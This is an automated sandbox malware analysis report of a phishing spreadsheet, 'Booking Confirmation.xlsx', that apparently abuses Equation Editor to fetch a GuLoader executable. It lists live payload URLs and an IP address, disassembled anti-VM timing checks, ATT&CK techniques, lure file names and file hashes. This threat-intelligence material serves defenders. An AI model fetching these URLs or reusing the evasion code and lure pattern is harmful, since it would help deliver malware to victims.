                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A100E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A4071
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2958
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A42CD
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1B1A
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1B5F
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A43F1
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A341B
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7D52
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0EFE
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0FB5
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6F9E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2793
                Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A01BE second address: 00000000002A01BE instructions:
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A70C1 second address: 00000000002A70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A8DB2 second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A8DFF second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F03A0E2C8FFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A7A0D second address: 00000000002A7A0D instructions:
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A01BE second address: 00000000002A01BE instructions:
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A70C1 second address: 00000000002A70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A8DB2 second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A8DFF second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F03A0E2C8FFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A7A0D second address: 00000000002A7A0D instructions:
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A54E7 rdtsc
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2280Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A54E7 rdtsc
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A50CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2958 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A71A9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6B93 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A341B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7D52 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2183 cpuid
                Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery31Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery313VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe7%ReversingLabsWin32.Trojan.Vebzenpak
                C:\Users\Public\vbc.exe7%ReversingLabsWin32.Trojan.Vebzenpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://ceattire.com/bin_UYDMbHwI28.bin0%Avira URL Cloudsafe
                http://180.214.239.39/port/.svchost.exe100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://ceattire.com/bin_UYDMbHwI28.bintrue
                • Avira URL Cloud: safe
                unknown
                http://180.214.239.39/port/.svchost.exetrue
                • Avira URL Cloud: malware
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.day.com/dam/1.03E10AF3D.emf.0.drfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  180.214.239.39
                  unknownViet Nam
                  135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:448719
                  Start date:14.07.2021
                  Start time:16:54:15
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Booking Confirmation.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:2
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winXLSX@4/11@0/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 53%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  16:55:06API Interceptor77x Sleep call for process: EQNEDT32.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  180.214.239.396306093940.xlsxGet hashmaliciousBrowse
                  • 180.214.239.39/ssh/.svchost.exe
                  6306093940.xlsxGet hashmaliciousBrowse
                  • 180.214.239.39/mssn/.svchost.exe

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNkung.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43
                  TT PAYMENT CONFIRMATION.xlsxGet hashmaliciousBrowse
                  • 103.89.90.94
                  lokibot.docxGet hashmaliciousBrowse
                  • 103.133.106.144
                  payment advice.exeGet hashmaliciousBrowse
                  • 103.89.91.38
                  PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43
                  INVM220210055600512.xlsxGet hashmaliciousBrowse
                  • 103.89.90.94
                  xP0clPWhrv.exeGet hashmaliciousBrowse
                  • 103.133.106.117
                  Doc1892071321.exeGet hashmaliciousBrowse
                  • 103.133.104.146
                  http___103.89.90.94_suket_wininit.exeGet hashmaliciousBrowse
                  • 103.89.90.94
                  DOC.1000000567.267805032019.doc__.rtfGet hashmaliciousBrowse
                  • 103.133.106.117
                  shipping quote.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43
                  INVM220210055600512.xlsxGet hashmaliciousBrowse
                  • 103.89.90.94
                  NEW ORDER.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43
                  OUTSTANDING SOA.xlsxGet hashmaliciousBrowse
                  • 103.145.253.94
                  6306093940.xlsxGet hashmaliciousBrowse
                  • 180.214.239.39
                  INVM220210055600512.xlsxGet hashmaliciousBrowse
                  • 103.89.90.94
                  pXL06trbQ2.exeGet hashmaliciousBrowse
                  • 103.133.106.117
                  DOO STILO NOVI SAD EUR 5.200,99 20210705094119.docGet hashmaliciousBrowse
                  • 103.133.106.117
                  11.xlsxGet hashmaliciousBrowse
                  • 103.140.250.43
                  6306093940.xlsxGet hashmaliciousBrowse
                  • 180.214.239.39

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:downloaded
                  Size (bytes):267376
                  Entropy (8bit):4.7769054763067915
                  Encrypted:false
                  SSDEEP:1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
                  MD5:FCFB0EC70F1419EDE8A534CC95CB61E9
                  SHA1:D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
                  SHA-256:FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                  SHA-512:FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, Author: Joe Security
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 7%
                  Reputation:low
                  IE Cache URL:http://180.214.239.39/port/.svchost.exe
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E7724F.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                  Category:dropped
                  Size (bytes):62140
                  Entropy (8bit):7.529847875703774
                  Encrypted:false
                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33A5C606.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                  Category:dropped
                  Size (bytes):85020
                  Entropy (8bit):7.2472785111025875
                  Encrypted:false
                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E10AF3D.emf
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):648132
                  Entropy (8bit):2.812180637073989
                  Encrypted:false
                  SSDEEP:3072:y34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:c4UcLe0JOcXuunhqcS
                  MD5:AF315ACBE803E8A5729F0B6B0CA5942C
                  SHA1:C21EDD8E79667300365573DF36DBEAD853977E9C
                  SHA-256:013B5B9200F01398565C59B4F815AF21F513FF7DC696787C8D838A510A101199
                  SHA-512:F3F6E76076AB29217315D2EC0E3E2F976290282F2F7F2FE6B6B4ED18363221E829882C306A01C75C4C81684884DF8F195869A889A83A12C13447F9A505A69FED
                  Malicious:false
                  Reputation:low
                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................P$...../..f.P.@U.%...../.../.....L./.../.RQ.RL./.D./......./.0./.$Q.RL./.D./. ...Id.PD./.L./. ............d.P........................................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...D./.x./..8.P........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87034804.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):94963
                  Entropy (8bit):7.9700481154985985
                  Encrypted:false
                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                  MD5:17EC925977BED2836071429D7B476809
                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                  Malicious:false
                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89452338.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                  Category:dropped
                  Size (bytes):62140
                  Entropy (8bit):7.529847875703774
                  Encrypted:false
                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                  Malicious:false
                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C86F0153.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                  Category:dropped
                  Size (bytes):85020
                  Entropy (8bit):7.2472785111025875
                  Encrypted:false
                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                  Malicious:false
                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9A0341A.emf
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):7592
                  Entropy (8bit):5.4446939747299385
                  Encrypted:false
                  SSDEEP:96:znUgcqHOvlJaX1/0q7r097v47LqLw1KG37oV9oaUd+dSOPUe1jc:bU/vTVgaL0K79oaUd+dQe1jc
                  MD5:90E7CF2722D8B0130292A0D91E15C2DF
                  SHA1:B2FBF1814AC8BBEED7A6F3074703BA34B392F107
                  SHA-256:ED43E23E4285C0EFBA4F46C6227BDDF4FD3C4DD758DD1280A6D8D5C21BD7E210
                  SHA-512:D280C16F0287FC2CC94CD9D08C7DDE11B24A14E720B910590A10445B1CC8FC0D57C323BBF1D5F9E9238E08135FD1609B8BF7094B7B408E4F82053C9F7C630AE6
                  Malicious:false
                  Preview: ....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d.........................'.q....\.............L..W.q........6.v_.q......q ...Dy.wx.................w....$.......d..........J^.q.... ^.q...x...@.......-...4...<.w................<..v.Zkv....X..o.... .........................lvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F50319D9.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):94963
                  Entropy (8bit):7.9700481154985985
                  Encrypted:false
                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                  MD5:17EC925977BED2836071429D7B476809
                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                  Malicious:false
